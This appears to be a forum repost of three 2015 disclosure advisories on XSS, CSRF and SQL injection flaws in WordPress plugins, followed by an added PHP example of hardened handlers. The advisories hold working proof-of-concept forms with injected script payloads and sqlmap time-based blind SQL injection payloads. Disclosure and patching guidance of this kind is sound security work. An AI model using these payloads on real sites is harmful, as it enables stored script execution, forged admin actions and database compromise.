XSS vulnerability in three WordPress plugins


  • XSS vulnerability in three WordPress plugins

    [align=right]XSS vulnerability in three WordPress plugins:

    1- WordPress Customize Youtube Videos 0.2 Cross Site Scripting

    Code:
    Title: WordPress 'Customize Youtube Videos' Plugin 
    Version: 0.2
    Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
    Date: 2015-06-16
    Download: 
    - https://wordpress.org/plugins/customize-youtube-videos/
    - https://plugins.svn.wordpress.org/customize-youtube-videos/
    Notified Vendor/WordPress: 2015-06-21
    ==========================================================
    
    ## Plugin description
    ==========================================================
    This plugin lets you customize the Youtube videos you are going to embed in your posts and pages
    
    ## CSRF/XSS vulnerabilities
    ==========================================================
    Customized video settings are displayed unsanitized when pressing "Get the new embed code for your customized Youtube video".
    
    PoC: 
    Log in as admin and submit the following form
    
    <form method="POST" action="[URL]/wp-admin/admin.php?page=customize-youtube-videos"> 
     	<input type="text" name="code" value="'></iframe></textarea><script>alert(1)</script>"><br />
     	<input type="text" name="start" value="'></iframe></textarea><script>alert(2)</script>"><br />
     	<input type="text" name="end" value="'></iframe></textarea><script>alert(3)</script>"><br />
     	<input type="text" name="autohide" value="'></iframe></textarea><script>alert(4)</script>"><br />
     	<input type="text" name="autoplay" value="'></iframe></textarea><script>alert(5)</script>"><br />
     	<input type="text" name="cc_load_policy" value="'></iframe></textarea><script>alert(6)</script>"><br />
     	<input type="text" name="controls" value="'></iframe></textarea><script>alert(7)</script>"><br />
     	<input type="text" name="loop" value="'></iframe></textarea><script>alert(8)</script>"><br />
     	<input type="text" name="rel" value="'></iframe></textarea><script>alert(9)</script>"><br />
     	<input type="text" name="showinfo" value="'></iframe></textarea><script>alert(10)</script>"><br />
    	<input type="submit">
    </form>
    
    
    ## Solution
    ==========================================================
    No fix available
    
    ==========================================================
    XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
    [/align]

    2- WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting

    Code:
    Title: WordPress 'Copy or Move Comments' Plugin 
    Version: 1.0.0
    Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
    Date: 2015-06-16
    Download: 
    - https://wordpress.org/plugins/copy-or-move-comments/
    - https://plugins.svn.wordpress.org/copy-or-move-comments/
    Notified WordPress: 2015-06-21
    ==========================================================
    
    ## Plugin description
    ==========================================================
    Using Copy/Move WordPress Plugin the admin can copy or move any comment from several types of pages to any other page!
    
    ## Vulnerabilities
    ==========================================================
    Two POST parameters are printed unsanitized on the plugin's admin page.
    
    PoC:
    Log in as admin and submit the following form:
    <form method="POST" action="[URL]/wp-admin/admin-ajax.php"> 
     	<input type="text" name="action" value="get_all_posts" readonly><br />
     	<input type="text" name="post_type" value="'</script><script> alert(1)</script>"><br />
     	<input type="text" name="action_type" value="'</script><script> alert(2)</script>"><br />
    	<input type="submit">
    </form>
    
    Some of the SQL queries are exploitable from the admin page.
    
    SQLMAP log snippet:
    POST parameter 'source_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
    ...
    POST parameter 'target_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
    sqlmap identified the following injection points with a total of 174 HTTP(s) requests:
    ---
    Parameter: source_post (POST)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1 AND (SELECT * FROM (SELECT(SLEEP(5)))HzuL)&move_comment_id[]=1&target_post=10&action=action_move
    
    Parameter: target_post (POST)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1&move_comment_id[]=1&target_post=10 AND (SELECT * FROM (SELECT(SLEEP(5)))kBfe)&action=action_move
    ---
    
    
    
    ## Solution
    ==========================================================
    No fix available
    
    ==========================================================
    Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

    3- WordPress Advertisement Management 1.0 Cross Site Scripting

    Code:
    Title: WordPress 'Advertisement Management' Plugin 
    Version: 1.0
    Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
    Date: 2015-06-16
    Download: 
    - https://wordpress.org/plugins/advertisement-management/
    - https://plugins.svn.wordpress.org/advertisement-management/
    Notified WordPress: 2015-06-21
    ==========================================================
    
    ## Plugin description
    ==========================================================
    Advertisement Management lets you administrate all the blog advertisements directly from the blog backend.
    
    ## XSS/CSRF vulnerabilities
    ==========================================================
    The settings on the admin page are vulnerable to XSS.
    
    PoC:
    Log in as admin and submit this form
    
    <form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update"> 
     	<input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br />
     	<input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br />
     	<input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br />
     	<input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br />
     	<input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br />
     	<input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br />
     	<input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br />
     	<input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br />
    	<input type="submit">
    </form>
    
    After having done this, some of the injected scripts will be executed when loading the front page of the site.
    
    ## Solution
    ==========================================================
    No fix available
    
    ==========================================================
    XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
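
A hardened shape for the handlers these advisories describe, as an added example that is not the plugins' own code or the advisory authors': nonce and capability checks against the CSRF delivery, context-specific output encoding for the settings form, and integer-bound queries for source_post and target_post. Function names, the nonce action and the UPDATE statement are assumptions; the field names and page slug are taken from the PoC forms.

```php
<?php
// Added example, not the plugins' code. adv_*/cmc_* names and the nonce action are
// hypothetical; field names and the page slug come from the PoC forms above.
const ADV_FIELDS = ['Advertising_front_page', 'Advertising_single_top', 'Advertising_single_bottom']; // first three PoC fields

// Save handler: reject unprivileged and forged (CSRF) requests before storing anything.
function adv_save_settings(): void {
    if (!current_user_can('manage_options')) {
        wp_die('Forbidden', '', ['response' => 403]);
    }
    check_admin_referer('adv_save', 'adv_nonce'); // dies when the nonce is missing or invalid
    foreach (ADV_FIELDS as $field) {
        $raw = isset($_POST[$field]) ? wp_unslash($_POST[$field]) : '';
        // Ad markup is expected here, but only roles allowed raw HTML may store scripts.
        $value = current_user_can('unfiltered_html') ? $raw : wp_kses_post($raw);
        update_option($field, $value);
    }
}

// Settings form: stored values land inside <textarea>, so encode them for that context.
function adv_render_settings(): void {
    echo '<form method="post" action="options-general.php?page=Advertising_page&amp;action=update">';
    wp_nonce_field('adv_save', 'adv_nonce');
    foreach (ADV_FIELDS as $field) {
        printf(
            '<textarea name="%s">%s</textarea>',
            esc_attr($field),
            esc_textarea((string) get_option($field, ''))
        );
    }
    submit_button();
    echo '</form>';
}

// Copy or Move Comments: post and comment IDs are integers, so bind every one as %d.
function cmc_move_comments(int $source_post, int $target_post, array $comment_ids): int {
    global $wpdb;
    $moved = 0;
    foreach (array_map('absint', $comment_ids) as $comment_id) {
        $moved += (int) $wpdb->query($wpdb->prepare(
            "UPDATE {$wpdb->comments} SET comment_post_ID = %d WHERE comment_ID = %d AND comment_post_ID = %d",
            $target_post, $comment_id, $source_post
        ));
    }
    return $moved;
}
```

The same `esc_attr()` / `esc_textarea()` encoding applies to the Customize Youtube Videos fields, which the first advisory reports as echoed back into the generated embed code.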